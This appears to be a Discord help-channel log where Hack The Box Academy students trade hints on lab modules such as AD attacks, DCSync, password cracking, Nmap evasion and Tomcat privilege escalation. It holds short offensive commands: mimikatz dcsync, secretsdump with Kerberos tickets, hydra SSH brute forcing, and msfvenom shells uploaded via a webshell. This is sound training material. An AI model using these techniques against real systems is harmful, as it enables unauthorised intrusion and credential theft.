it worked for me

Hi guys, how cn i see the last modified file in a directory and his name

With ls -la?

you could use find

I cnt see it

Oh okey now yes

Find

this works too @pallid geyser just tried it
Its been a whiile but find has a -newer and also time switches to pin point the exact time or a range of time when a file or folder was edited or created you could try searching the man page.

Okey thank you guys

But with find i must use find -newer and??

found an error on a module but I cant send the msg in erratum

nvm I changed it

hey yall i dont understand

the ACL enum in AD module

they mention the user wley and how he has control over the damundsen

and i understand that the user wley has User-Force-Change-Password

but how do they know right away it is for the damundsen user?

ion get it at all...

pls someone explain... 🙂

since in the commands output there is no damundsen user mentioned

When you list the ACE's in context to the domain user wley, you can see from one of the ACE entry where damundsen show's up. Read the command output in the module carefully.

which cmd if u dont mind me asking?

Using Get-DomainObjectACL

Dana Amundsen is damundsen

And once you do a reverse search on the GUID of the objectACEtype, it'll show you what access wley has over damundsen.

hey does the RDP access work for you guys on the module password attacks and section Pass the Ticket (PtT) from Windows ?

Make sure you're wrapping the passwords in single quotes

lmao thanks

scriptie why does wrapping the password in single quotes work?

Kerberos Attacks
Unconstrained Delegation - Users

I can't get the dcsync attack to work. I can get the TGT from the DC, I export it, then try to dcsync with secretsdump (using -k -no-pass) or crackmapexec (using --use-kcache) and none of them works. Secretsdump just returns nothing and cleans, cme says "Name or service not known". Am I missing something?

Edit: answer was I was editing /etc/hosts incorrectly, it needs <IP> <DOMAIN> <HOSTNAME>
i.e.: 10.129.179.22 inlanefreight.local dc01.inlanefreight.local

Can somebody give me a hand here? The question is: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only) . I best bet so far is $ cat /etc/services | grep "tcp\|udp" | wc -l, but that is incorrect.

yeah but how did they get the "damundsen" as username

i can see it says CN=Dana Mundsen

but like it didn't show exactly the usrname as it isi

is rn

Hey ! Can i DM someone regarding this module:

Module:ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

by mounting a folder

module -password attacks, section- pass the hash

I finished all the question buit I believe it is not the intended way so I have a question:
as a user david how can I read the shared folder data for david in the DC01 while david don't have access there?

what you're looking at is the distinguished name, what you're looking for is the samaccountname. There are PS and PowerView commands to help get you the samaccountname using the distinguished names.

HTTP and SMB are your helpers

I'd suggest you go through the Files Transfer Modules in Academy to learn about these.

The simple answer is, The david share on DC01 is configured to allow david user to access it. He can't access anything else except that share.

What is your question? You can ask here

I'm on the Credential Hunting in Linux Module in the Password Cracking lesson, and am unable to use the LaZange program since the module is not loaded on the target machine. I tried to install it, but that requires sudo prvileges I don't have. Is there a workaround for this?

You can also base64 encode the file, then decode it.

i think its solved now. Just had to wait till the dns service pops up i guess....

Yeah it takes some time to show up

You can also base64 encode the file, then decode it.

I'm on the Credential Hunting in Linux Module in the Password Cracking lesson, and am unable to use the LaZange program since the module is not loaded on the target machine. I tried to install it, but that requires sudo prvileges I don't have. Is there a workaround for this?

Yeah it takes some time to show up

i think its solved now. Just had to wait till the dns service pops up i guess....

is it just me or Discord is acting up

how long do i have to wait for this? been like 5mins at least

It'll take a long time,

in the login brutforce section "Service Authentication Brute Forcing" i cant connect to ip

get a snack

hi folks, I'm working on the attacking Web Apps with FFUF module and I am confused by the following sentence: We get an empty page, indicating that the directory does not have a dedicated page, but also shows that we do not have access to it, as we do not get an HTTP code 404 Not Found or 403 Access Denied. Should that read "we ** do** have access to it", or am I just missing something? It seems like if we do not have access to it, then we would expect the 403 code...

does it take a long time to start up?

does it take a long time to start up?

which section?

It can take a super long time. I usually recommend doing
$whatevervariable = GetDomainObjectACL -resolveguids -identity *
and then just piping off of the variable, so you don't have to keep running the command.

it means that its a directory with no web content, but in that directory are sites that are accesseble to a user like example/blog/index.html

does it take a long time to start up?

Hey guys. I am currently on the last skills assessment for the Attacking and Enumerating AD module.
I found a user with the SeImpersonatePrivilege enabled. Now I have to carry out teh PrintSpoofer attack or the JuicyPotato attack. I can clone these repositories but I dunno how I can compile them (they are both visual studio project if Im not mistaken) whereas my attack machine is Kali Linux. Any tips and tricks would be greatly appreciated!

find / -type f -newermt YEAR_BEFORE-MONTH-DATE ! -newermt YEAR_AFTER-MONTH_AFTER-DATE_AFTER
Something like this

i believe a compiled PE32 exeecutable is in this repo for both 32 and 64bit arch https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Hello

im doing AD enum and attacks module and when i run bloodhound i get no querys loaded

i first used

PS C:\htb> .\SharpHound.exe -c All --zipfilename ILFREIGHT

then started bloodhound with the bloodhound cmd

nvm got it it was bugging for sm reason

I am super stuck in the module if anyone can help:
Pass the Ticket (PtT) from Linux

I am at Check Carlos' crontab step and I found another keytab folder put the password is not working

thank you sir!

piping off the var with what :D

Anyone here get through the bypassing encoded references section in Web Attacks? I could use some assistance with this one. I've tried fuzzing numbers from 1 to 20 but that's not working for some reason.

You found the folder however I'm no quite sure what do you mean with "put the password is not working"

if you still need help I can dm you or you can dm me

I am root now but still stuck, will dm you thnaks!!

Hi so i'm on the network enumeration with nmap I'm struggling with the firewall evasion the medium one I've tried all the things I now i used -sS sA sT i tried port 53 i tried some scripts i even used the machine of the previous test as a DNS but nothing worked
And when i tried a UDP scan i a got something but it wasn't the correct one

Can any one help me out with it ?

recompile the binary on your host, but before doing that run export CGO_ENABLED=0. That fixed the issue for me

dm me your findings if you want, I'll take a look

I'm not entirely sure what the underlying issue arises from. only found that fix online and didn't question it any further

great 🙂

Hi, can anyone help me with the redeemer module (starting point)?

https://discord.com/channels/473760315293696010/1114922522404737111

I'm really confused on whats happening there

why cant i bruteforce ssh with hydra?

hydra -L not -U

Any of the functions that you'd want to check the info against, like in the module.

It thinks you're supplying two targets by supplying -U I guess

hmm, renamed the two files but still not working

renamed the files?

can you show me the command you're executing again?

There was no reason to change the file, just the argument

hydra -U usernames -P passwords ssh://10.129.202.136

i renamed usernames.list to usernames

hydra -L usernames -P passwords ssh://10.129.202.136

I mant it like this

ohhhh

now it works

my bad

developer's choice, always read the tool's usage.

i thought it was -U like in crackmapexec

oh gotchya, yeah that makes sense. added to the notes

Maybe for "Logins", but yeah different conventions are way to get mixed up

Never mind. I figured it out. Base64 is your friend.

b64 ftw

I've got a little bit struggle on retired machine,"Ready". Can I ask for help here?

#boxes

I have no access to the link

You need to verify your account

I had have verified my account.

Hi, in the reedemer module (starting point) the 6379 port should be open (as I can see in the walthrough) but it's filtered if I check. Somebody could help me?

If I perform a nmap command with -sU is open|filtered, but not just open

that is not a module on HTB academy that's a box on HTB, verify your account by using /verify at #bot-commands and ask that in #starting-point

use /verify at #bot-commands and ask that in #boxes

Sure! I'll try it.

Thx u guys

check out the /drive switch

reading the man pages first is always helpful tho

Or just copy and paste, since it's RDP

Hello all, I am the last step on the Password Attack Lab - Hard, I got the|| SAM and SYSTEM files, and used samdump2. I got the hash for administrator, but I cannot use it, crackstation says|| its empty? Any hints would be great.

you could also use the imapcket smb server technique too and mount the directory as a network drive with net use

Youre welcome.🤞🏽

I don't remember exactly but, if it's a blank, what else can you do just with the hash?

Give it a try, if it fails, move to next file transfer methods.

what do you do with a hash when you cannot crack it? go thru the section over again you might be missing something

I tried to|| PtH with xfreerdp|| but was unsucessfull

RDP isnt the only way to gain access onto a box, enumerate harder.

got it, thanks!

Hi.

Anyone here?

it was a tool issue,|| samdump2 gives different hashes than impacket-secretdusmp||, thanks for your time

Oh, I remebered facing the same blank password issue, and I think this is what I too did. Anyways, good job finding it on your own

ty!

You are on the wrong server.
No, we don't attack Instagram, Facebook, Roblox or any other systems.
Contact the support of the service you need help with

Having an issue with the Chaining IDOR Vulnerabilities section in Web Attacks. Is anyone available to assist with this? I can't seem to formulate the correct script to enumerate all users.

how many minutes before i should quit brute forcing at the password cracking module should i wait?

None of those should take more than about 5 minutes.

just a simple bash for loop with curl and grep should do the trick?

Okay, but I can't find the right encryption used for the uuid. I've checked all of my resources and nothing comes up.

Ah is it the ||uriencode|| one that you're working on?

Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page. Is the question.

Maybe you're over complicating it?

Take a look at the requests again and see what you are the things you only need to achieve the goal.

Okay, thank you for the hint. I'll see what I can come up with.

I figured it by using Intruder in Burp Suite. I should have thought of that before. Crafting the script for this was just not working.

jupiter box is down?

wrong chat

if you want I can show you the bash script way. dm me if that sounds interesting

I sent you a dm.

"static {
a[0] = "";
a[2] = "[>T\t\006\001\003\006\032";
a[4] = "AmB\021";
a[6] = "KHS";
a[8] = "R;U_";
a[10] = "[/T\030\006\001\003\006\013";
}
"

in upper can someone tell me how do i can identify the encryption algorithm and also decode

in Directory Fuzzing, just before the lab

???

I understand that, but am confused about the wording which seems to say that we don't have access to this directory when it seems like we might have access to the directory's contents, it's just not set up to not show it on the url. I think the wording is just clunky.

Thank you, though, @cyan ginkgo

???

Stuck in the Enumeration with NMAP module where I'm trying to find a flag from the services on the target host. I did find a flag like HTB{....} in my scan, but entering this into the answer it doesn't get flagged as the right answer.

gotta be more specific
What module? what are you tryna do? what have you done?

Sorry. Module is https://academy.hackthebox.com/module/19/section/103 -- the question in the end says to enumerate all the services and that one of them is giving a flag that nmap doesn't display by default and that I should find it. I ran nmap --packet-trace to see all the packets and indeed I see that one of the responses from one of the ports contains a HTB{...} string, so I'm strongly thinking this is what I'm looking for, but entering it, I might be wrong.

Which section inside the module?

"Service Enumeration"

make sure you don't have any trailing spaces

ty. confirmed, no extra spaces anywhere. still no success. i also respawned the target, just in case.

Checked the module again, it is working for me (as in I find the flag I correctly submitted before)

Are you submitting the whole flag? If so I can check with you by MP it's the correct one

Submit it with HTB word and with the {}

All the flag

Not only the numbers inside {}

hello everybody, Guys can somebody help me I am stuck at footprinting module and mysql section question: During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?

Okay, i remember this...

You are scanning the wrong service

Try with other port

A ||high port||

What is your issue?

mysql -u root -probin -h 10.129.42.195
ERROR 1045 (28000): Access denied for user 'root'@'10.10.14.152' (using password: YES)

You are not using the user:password combination that is given to you/that you found 😉

Doing Windows Privilege Escalation: Situational Awareness

What executable other than cmd.exe is blocked by AppLocker?

I have used the following command:

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\*.exe -User Everyone

but it only show cmd.exe as blocked and no other executable

So is anyone actually doing the QA from the end of Documentation and Reporting? I just spent an ungodly amount of time working on a report. It's almost done, just working on appendix. Anyone feeling excited to do the QA for me????

any help is well appreciated

Hey, just started using htb academy and not a huge fan of using the in browser vm, so im planning on just using one of my own, any suggestions for what distro i should use? preferably one that comes with a lot of the tools needed for the academy pre downloaded

<@&861185840277487616>

Fuck off, kindly

Ty

does anybody know of a udp flooding tool i can use?

I gravitate towards Kali Linux as that is where I started. But there is also the HackTheBox specific ParrotOS you can find here -> https://parrotlinux.org/download/
There are, of course, many other flavours... Download 1 or all of them and have a crack and see which one you like.

i trie loic but ive only found the sourceforge one.. im not downloading anything from sourceforge

is this for an academy module?

ty vm

i dont know

im like

new

idk what that means even

Ok, this is a place for questions about HackTheBox academy modules (a learning environment). Likely not the place to answer your question.

You're asking people for a tool to DOS someone

im going to dos myself.

Right.

sorry

If you want to Denial of Service yourself, just unplug your router

Hammer.

I think it means we do not have acces to the /bg/ directory but the files in the blog directory we do have acces to so the bg has no rwx priv but on the /b**g/example.htlm we have r— access

AD- Attacking Domain Trusts - Child -> Parent Trusts - from Linux I can login to the DC with psexec, but I can't get secretsdump to work to grab the hash.

i dont remeber adunn's passord

I'm stuck on the Burp Intruder portion of the Web Fuzzer section in the Using Web Proxies part of the bbh path.

I feel as if I may be missing something or doing something incorrectly.

i mean if you still need help on one of the questions i can give you a hint

hint you are on the right path using Get-AppLockerPolicy and there is multiple example for this command in that section, hint try other example about this command

Hey, on the AD Module, in the LLMNR section which password list did you used to crack those hashes?

if you managed to a shell on the DC then your first attack is probably right and so you should be able to dump the hash with secretsdump and the command i use for this is 90% similar to the psexec command

http://dontasktoask.com/ and for someone to able to help you, you kinda need to say exactly what is your issue

i use rockyou for both from windows and linux

Anyone complete any of the hard modules. I have 500 cubes after completing the pentest path and want to see whats recommended. I am looking at the Kerberos Attack on right now, but not sure how much of that module I could just lab up and do personally or if its worth it.

i haven't done any but personally i would say if you want some AD stuff go for the crackmapexec or kerberos module or if you want to go for web stuff the Injections module look alright but for the AD modules you will get good lab that you can also practice other or similar attack but the web stuff you can get it for free (even the lab) on portswigger academy

yeah, any of the modules go over antivirus evasion at all? I am going to start jumping into some prolabs and I think that might help.

i get an education fund stipend and probably after DefCon I will just see how many cubes in total my job will pay for. Web is my weak point, but AD is where I have fun.

Yea prolab is the best for learning these type of stuff not mentioning the labs you will get and especially with the new price I'm 100% recommending it and I if you want a challenge (a kick on the nut) go for offshore

Hi all, new to HTB academy here and would like your thoughts about your experience with CPTS and CBBH. Should I be jumping straight to silver monthly subscription without prior experience? Do I need to familiar myself with networking, bash,powershell,pwk, etc before i do? For starter how many months of commitment would be needed before tackling either exams? Appreciate any helps

The time thing it's completely dependent on where you are and how much knowledge you have on the topic of either exam and of course you need to know the basic before jumping in so I would say take your time learn the basic (tier 0 modules is free) and then jump in to the exam path's

I’d do the Information Security Foundations path first, so you have a solid foundation.

I am using Burp Intruder to fuzz and try to find an .html file with the flag. I have my payload reading from my wordlist and have '.html' added as a suffix to the directory. I have yet to find any .html file when it runs through the word list.

Check your payload position and if you think its correct try a different wordlist.

Password Attacks Lab - Hard | How can I downland a BIG file over ||smb||? it is getting timeout all the time help?

|| (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now||

hey, you got a solution? I'm stuck before with the krbrelayx, I got "Ciphertext integrity failed. Most likely the account password or AES key is incorrect!"

there is an option that you can mount the smb share

I see thanks for that

ill try that ty for inputs

Not yet, still chatting with Support regarding this

are you doing it from your VM or the workstation in academy?

From the academy pwnbox

when I was doing it using pwnbox it worked

@reef drift @steady matrix feel free to dm the commands (in order) and the output that you have so far

hello guys, Where to contact the support for the academic email verification ?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Hi, I am stuck at cracking notes.zip with john

Protected archive module

Anyone can give nudge pls?

Have you tried giving it 2john? (Note may need python2.7)

Yes sir, using ssh2john

With python 2

Using rock you.txt and provided password list. But doesn't show any cracked password

the password is neither in rockyou nor the password list provided

try to recall what you have done with the provided one in a previous section

Got it. Forgot to think out of the box hahaha

Thanks guys @autumn pilot @fathom pendant 🙏🙏

Does anyone know how to install pgadmin4 into the pwnbox? The commands provided in the Advanced SQL Injection module don't work (there's no release for "ara").

Ah thanks man, Support actually went through all this and turns out something's not working with the environment, I was doing everything right

hi

I have a website, and I think it is very good in terms of security, but I am thinking about how to make the website even more secure. For this, I want to ask you: if you see a JavaScript-based website, how do you test its security or evaluate the security of websites like this? How do you test the security of your own website?"

Please note that while I have provided a translation, the request appears to be about seeking advice on website security testing, which is a complex topic. It is always recommended to consult with security professionals or experts in the field for accurate guidance on testing and enhancing the security of websites.

Read #rules and #welcome

does crackmapexec have any option to run multiple threads on a host? I tried to use the -t option but dont see any improvement in speed

hi, i have problem with dcsync attack, "Active Directory Enumeration & Attacks " Module. i found user with "Store password using reversible encryption" option. and i need password of this user, i ran mimikatz and tried to dump hashes with this command: "lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\USER" but mimikatz is erroring. am i doing something wrongly?

which user do you have the shell as?

the shell where you're running mimikatz

im connecting RDP with htb-student user

Review the requirements needed to perform a DCSync attack.

Hi did you manage to figure this part out?

Yep!

nice! is it possible to get some help?

Ask your question, I'll be back later. Wife wants to go for lunch 🙂

Hi All
I'm just doing last quest from the Metasploit > Sessions & Jobs
I created a background on the metasploit but when I'm trying to exploit and get access to root there is the info: Msf::OptionValidateError The following options failed to validate: SESSION
But I set the SESSION
Anyone maybe know what is going on?

Ok cool, I'll be in bed here lol just having trouble with rce. pretty sure its via the|| import post function|| but cant get it to work

in the attacking common services/attacking dns section. i have used subbrute to uncover 5 other dns records. i dont see a flag. i then use the "host" command on each one and still dont get anything. could use a nudge

what sessions are listed after listing them. i think the command is "sessions -i"

do i need to log in as a ad**n or snron account? i also checked ADSI and everything is same as its shown on the image

4 and 6

Well, if you know who to use to perform the DCsync attack then use that user.

and you set it to each one of those and still get the error?

yep

why is there 2 sessions? is it worth trying to close out a session and try again?

because I use background options 2 times

I was also trying to kill all sessions and also doing this with new IP of machine

but i dont know how to perform this attack from other user. should i switch user or what should i do?

hello to all !i have difficulty with nmap
I have two questions to which I have not found an answer for a week.

on part of nmap about NSE
I can't find the flag I tried several scripts such as this one

sudo nmap Ip -sV -p 80 --script vuln,banner, -sC

but nothing I can't find what corresponds to the flag. HELP

you have the other user's creds right?

yes

☝️

yes but how can i switch account to perform this attack? i have different users credentials, how can i use those credentials? should i specify them as a argument in any script?

Hey, can I DM someone about Attacking Common Services - Hard?

what does the output say? What is vulnerable?

make use of the runas command and also iirc you can login as the other user directly with RDP

the question of that part is : Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.

If you run your NMAP command from before, it will show you what is vulnerable. Take a close look at this

okay give me 2 min

im doin DCSync and i need to use secredump.py on adunn user

but i never got adunn's pass

these much information , i don't know which i need to use

nvm it was in the past moduless....

??

huh

:/

why is it giving me this as an output

wtf

there is not even an mimikatz.exe in the

Tools dir so i can do it the other way lol

stuck af on this

Go through the vulnerabilities and see what you can use

Why I cannot run pspy64

do an ls -la and check out the permissions

fixed with chmod +x filename

thanks

anyone did the password attacks - mutation list challenge recently where you have to crack pass of SSH user 'sam' ?

would these two commands be enough? (as it takes more than 40 minutes and still not successful)

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list 
hydra ssh://10.129.202.64 -l 'sam' -P /tmp/mut_password.list 

can anyone give me a nudge on this one? thx

the mut_password.list has 94044 lines, not sure how much it needs to run or if I am doing it corrently at the first place

Please somebody has resole in the Nmap enumeration part , the Nmap scrip ENgine question?

Most frustrating module

It took me about 4 hours

holy crap, I guess I will have to wait. Thanks

hint cut the first 17000 password and yes that part is Fing frustrating

Oh... ||you're on the right lines... try looking at some of the tools for creating automated exploits for PHP frameworks.||

hydra is already ~2hrs into the process, I will let him cook 👨‍🍳

There's another service running you can use

in the attacking common services/attacking dns section. i have used subbrute to uncover 5 other dns records. i dont see a flag. i then use the "host" command on each one and still dont get anything. could use a nudge

Perhaps you should dig

I have stuck in Miscellaneous Techniques from linux privilege escalation

Review the NFS server's export list and find a directory holding a flag.

i keep getting time outs using both the ip address and the DNS name

what did you find when you checked the exports list?

dig axfr subdomain @ip

Export list for 10.129.2.210:
/tmp             *
/var/nfs/general *

I also try this

Hi, I have a question about the footprinting/IPMI module. I've managed to get the hash but I can't crack it either with john or with hashcat. Also, is it normal that the hash changes each time I run metasploit?

Don't use the hash mask from the module

what do you mean ?

What does your command look like?

here you are already root (Unless youre trying to root with no_root_squash), and you know the format of the flag to be "HTB{**}" try to grep in both directories if what you need is your flag.

yes, but I use different method to get it

john --wordlist=/opt/rockyou.txt hash.txt
hashcat -m 100 -a 0 hash.txt /opt/rockyou.txt

i swear i hate DNS. i did the below command for all the subdomains found with subbrute. dig AXFR ns3.inlanefreight.com @10.129.203.6. transfer failed on all 8 subdomains

I am not sure why that section has root directory and after using this command gcc shell.c -o shell

It might be possible, because the vendor default hash password for HP ILO is randomised 8 chars, numbers and upper case letters

Restart the box and rerun the subbrute. The first one will be the answer

thanks

It's not hp ilo

ok so I am doing Privileged Acces module and im connecting to mssql from windows host

could you clarify if you are trying to root the box via no_root_squash or youre trying to get the flag?

Also the answer is static

now what do i do? i can do it with mssqlclient on linux

but interested how to do it over windows since its not provided in the module

for some reason

only the cmd for connection is provided

sqlcmd

liek jsut type in the sqlcmd in the powershell?

im getting an error that its not recognized

Weird

I've done this but always the same thing

Is your @ip including a period at the end?

no

is it normal that everytime the hash change when i run metasploit ?

Sorry replied to wrong person

It shouldn't

Solved?

Every time I run metasploit the hash changes

It shouldn't I don't believe

nope. i just dont have any intuition when it comes to DNS like i do other ports. I think im messing something up.

You have to see that ahah

Does your dig command include the period at the end?

Or was that just splitting your sentence

can I send you a screen?

just splitting my sentence

am i only one here who dosent understand wtf is this
(windows fundamentals thing btw)

also how to get academy user role

Silver annual sub

??

It's the access control list of C:\windows

For academy student role

just silver annual?

i think so

https://tenor.com/view/sad-garlic-plants-v-pvz-pvz2-gif-25821283

For getting the academy user role, yes, as iirc the silver annual gives you a thing like main site to verify with

hi, what is answer, Which version of Metasploit is free and can be used only through a CLI? , i think Metasploit Framework

@frigid patrol i think the community edition of metasploit framework

and you should post the module and the section

yeah, i tried it, it's incorrect answer

tell me module and section

Metasploit Framework, Intro to metasploit section

||Msfconsole||

okay, thanks man

Glad to help

Meterpreter section, target machine didn't work, i think it's windows/http/fortilogger_arbitrary_fileupload

[+] Generate Payload
```, i can't get meterpreter shell,

Cant help u with that, i didnt take notes for metasploit module :/

The payload is correct. What exactly is not working?

idk, it's working Generate payload for some time,

lol the hash isnt the same @rapid sparrow use rockyou.

||

[*] Started reverse TCP handler on 10.10.10.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. FortiLogger version 4.4.2.2
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175174 bytes) to 10.129.203.65

||

Otherwise try the PwnBox

is that the footprinting module?

yeah sorry wroong tag @whole grotto

if you still have issues you can come to dms lets get it to work

the Skills Assessment is so hard

not really 💀
that was one of the very easy modules, I guess you just over looked some things and its fine

I got flag 1 and find flag 2

don't know how to get the other user acc

go over the sections, understand it and chain them all
if you have issues you can send a dm

dm

https://academy.hackthebox.com/module/143/section/1272 what wordlist should i use?

im using rockyou.txt and it is not working

nvm i must have been writing as space or something it worked now

Hi, I've been stuck on flag4 in the Linux Local Privilege Escalation - Skills module for three days. I have obtained the credentials for tomcatadm and the corresponding password, but I don't know how to open flag4.txt. Could you please provide me with a hint or send me a direct message?

Did you get this sorted with Attacking Common Applications Attacking Tomcat?

Active Directory Enumeration & Attacks I didnt put adunn's in my notes. I now need it and i dont know what section his credential where in. can someone help

id recommend going over the tomcat hacktricks page

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat

The relevant bit is also from an earlier module but idr which one

Thank you for your help

once you figure it out its a good idea to save that specially in your notes somewhere, theres a lot of similar things that can come up that can be exploited in exactly the same way 🙂

so its a good thing to have sitting in your backpocket

It's in the ACL Abuse Tactics sections, if you've answered it. It should still be there.

in addition to the above, I highly recommend while doing that section to keep a credentials list for the module

youll be acquiring several diff users passwords and many of them are reused for the labs

somebody know how to resolve the last lab of nmap?

i have try this

ncat -nv --source-port 53 ip 50000 but nothing

it is a nmap module and they make u use ncat?

ncat is made by the nmap people

but no you dont have to use it

i just checked it and i did all with nmap

thank because i have try all nothing it working

when in doubt try more patiently

can anyone help me ? i am in a bit of confusion

Just ask your questions directly.

yea so is it possible to a test hacking site , to get the data from the main modules?

https://dontasktoask.com/

wdym

yes i have try since this morning and it is not giving

let see there's a testing site , there is data encrypted there so we can get them or not possible?

can i ask to you how have you resolve it?

Hii,
For Linux Priv Esc is it normal that the service they are talking about and the creds || in the cat /usr/share/tomcat9/etc/tomcat-users.xml|| are not working or it is issue with the box??

module Active Directory Enumeration & Attacks section Attacking Domain Trusts - Child -> Parent Trusts - from Linux I can dump hashes with secretsdump but user bross doesnt have a hash. Im definitely missing something just not sure what

check running services

just run a scan to all the ports

and check them

i have done that

sudo nmap -sS IP -Pn -n --disable-arp-ping --source-port 53

I checked them, and I found that ||tomcat|| not sure if they mean something else in flag4 wasted hour looking for it

you would need to find a way to forward that

why would I forward it it is already running on port 8080, am I missing something

nmap --help and read what each thing does

the credentials dont work, but its running as the tomcat user which if you cat the passwd file you could see he also has a login shell, ||remember the war shell trick with tomcat and see if you can shell the box as tomcat user||

thank but i not what each word of the script do

i have found the hiding port with that script now the problem is to fine the flag

ok

safary autodetects academy.htb isnt a valid website as .htb exts dont exist and just makes me search result academy.htb even after its in /etc/hosts file...

is there a way to force enter domain on safari or is that a minus for me

||admin.academy.htb|| for example

Safari?

Why not just user a different browser instead?

cba to install one rn

wait i had an idea

nope using ports still google searches

ugh pwnbox it is

@vital adder I don't need help with the questions. There's an optional "question" at the very bottom that encourages users to write a report, then find someone on discord to do QA with.

or maybe im not supposed to go to the site.. its ok ill try figure it out

mind if I send u dm? Nvm, thankyou tho!!!

how do you hack?

simple you go terminal and write hack Minde

with this i have no result

deathnote style lmao

yes you may.

Can someone help me with footprinting lab hard?
Ich find the private key but I’m struggling to login with ssh. Can someone help me with the id_rsa file?

What is not working?

fixed it. i was being stupid and didnt add http:// to the url...

You might need to change the permissions of the private key

So I find the private key and now I have to generate the public key right?
But I don’t know to to generate the key and where I have to safe it.

no

is this ssh keys we're on abt

oo ya

just login with this key

But where do I Safe the private key? So I mean in id_rsa but how can I do this?

You can just copy paste the key you found on your local machine and use it with ssh to login (I'll let you check the man pages for how to do that, or google)

it basically does not matter where you save it

ssh -i /path/to/your/key user@10.10.10.10

remember to give the key the right rights

Ok thanks i try it

https://academy.hackthebox.com/module/143/section/1490 what ip i need to enumerate?

am enumerating the 172.16.5.5 but not sure if it is that one

when in doubt scan the internal network for live hosts

cme is good for this

cme smb 172.16.5.0/24 -u"guest"

even with bad creds it'll pull up the machines that respond and give their AD hostnames

the DC usually stands out

that is the only i can enumerate withput creds

thats what im saying

it still works

you can also usually just spot the DC from an nmap scan cause itll be the machine that has kerberos, ldap, and domain all running together

Hi,i am on Attacking Common Services module,specifically on sql part. Second Question is that " Enumerate the "flagDB" database and submit a flag as your answer." . I got user who can access this db and find table name,but i dont find good cheatsheet to enumerate mssql. I cant access to columns of table for example. Can someone help me?

Select columns from database_name.tablename;

(note that's a placeholder for the flagDB.{database which you're querying}

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks,everything is in academy. My bad. THank you

Please help me... I don't understand the section Nessus skills assessment in the module vulnerability assessment

The nessuss scan i think is optional due to the duration of the scan. So do i need to login in the target below with ssh and answer the questions?

Or the questions are asked with the nessus scan?

I don't understand this section, sorry

I have connected to the machine and i am root

Scanning yourself is indeed optional, though it might be nice to try to do it if you can.
You don't have to connect to/ hack into the target machine, the only answers you need are based on the nessus scan report.
Just read through it to get the answers.

Anyone free for a nudge on Kerberos Attacks assessment? Been at it for several days and cannot figure out the last portion; dunno if its a bug in the module or something I am missing

hint: sit and wait, once you have waited enough ask about the next thing as soon as you have it you are in

This is response to me? I fully compromised the first machine, however based on the delegation settings, the printerbug//coercer is not working against the DC despite bloodhound verifying the machine has unconstrained delegation

Hey peepz, i need a hint for Windows Privilege Escalation Skills Assessment - Part II - 2nd Question?
I have enumerated vulns ...im failing. Also, I tried 0668 from the previous module but nodice. As well as look for manual exploit chains and still having trouble @>@ dig up relevant info

Maybe you just need another tool to grab something. 🙂

Which tools?

Yeah, that's like on you to find out. ^^

I mean you have everything you need.

If i have a doubt with starting point machines where can i ask?

#starting-point

i dont know why but i dont have acces

read #welcome

somebody has an idea , how to see the flag

i have done many combination this give me most details

Which tool can you use to query the banner?

is also possible with ncat

I have try but...

I dm'd you.

thank

now it's working. the reason for the failure was that I did not have sudo rights

thank 💪

The output told you that the permission was denied.

yes

i have try adding

sudo at the bigging

and is okay

😁

https://i.pinimg.com/originals/90/18/0f/90180fc49bd52a5c4d94223d8f98bee5.jpg

🤣

lol

Does crackmapexec stops on success when brute-forcing?

Anybody?

Yes, --continue-on-success to keep testing

Did you run a sharp tool?

Thankyou ill give that a shot , that slipped my mind

@blissful verge Interested in looking at my report from the Documentation and Reporting module? Or perhaps any other Academy team members?

Thank you!

np.

MORAL OF THE STORY: Don't forget to update ruby when running msfvenom @.@

@steady hawk Thanks for the tip

guys i need help with the Attacking Common Service Easy lab (/module/116/section/1466) ... I found the user and the password but I am unable to get the flag through load_file in mysql or through a webshell ... i am sure I am doing something wrong just need a bit of guidance please

Try ||uploading something that gives you remote access||.

I did ||upload a webshell (a normal php oneliner) and wwolf webshell|| but when I click on the uploaded file I end up getting it downloaded

Then its probably not a correct file.

would it be possible for me to discuss this further with you over dm?

how can i find the ip of a website that i can use for commands? (kali)

What you mean

maybe ping?

dig

nslookup

ping

curl

for nslookup there are 2 ip's

ok

https://academy.hackthebox.com/module/143/section/1421

question 3 I dont really get how snaffler works

It enumerates all the shares in the domain that your current user has access to and filters content that might be useful by testing regex

Their github page explains it a lot better

then i dont know

i have output the file to snaffler.log

and i cant find the answer

I am having trouble getting powerview.ps1 or a revershell to the initial host in AD Enum and Attacks Part I, I was able to get questions 1 and 2, but I can't get password for account XXXXXXX because I can't get the ticket, any nudges here?

I personally used a meterpreter shell and then used its upload functionality to upload powerview

But how did you authenticate?"

Because we have a web shell lol

Upload a msfvenom shell to the web shell, execute it, and catch it with meterpreter

kk

Hello All, I am doing Active Directory module is there any reason why i am getting this error?

Have you imported the poweview.ps1 module?

yea

you need to import it for every new PS session, in case your opened a new one.

aha

Try importing it in the session you have and try the command again

thank you 🙂

you the best XD

https://tenor.com/view/thank-you-gif-25358104

😦

sage

@steady hawk sadge, I'm clicking browse... -->upload and it just dies

Get a reverse shell and try other upload methods.

Yeah I'm like starting from the web shell, I must be tripping

I just tried it and uploaded fine

Oh I got it

I'm not sure about the Antak-Web shell but I think in the user input field, you got to set the path where you want to upload the file?

What the hell, got it

I must be tripping thank you

Hello All, Am doing the AD track Sizzle box. When I try to request for User certificate i get below error.tried with different browsers.

" Error

Your request failed. An error occurred while the server was processing your request.

Contact your administrator for further assistance.

Request Mode:
    newreq NN - New Request (keygen) 
Disposition:
    (never set) 
Disposition message:
    (none) 
Result:
    Invalid pointer 0x80004003 (-2147467261 E_POINTER) 
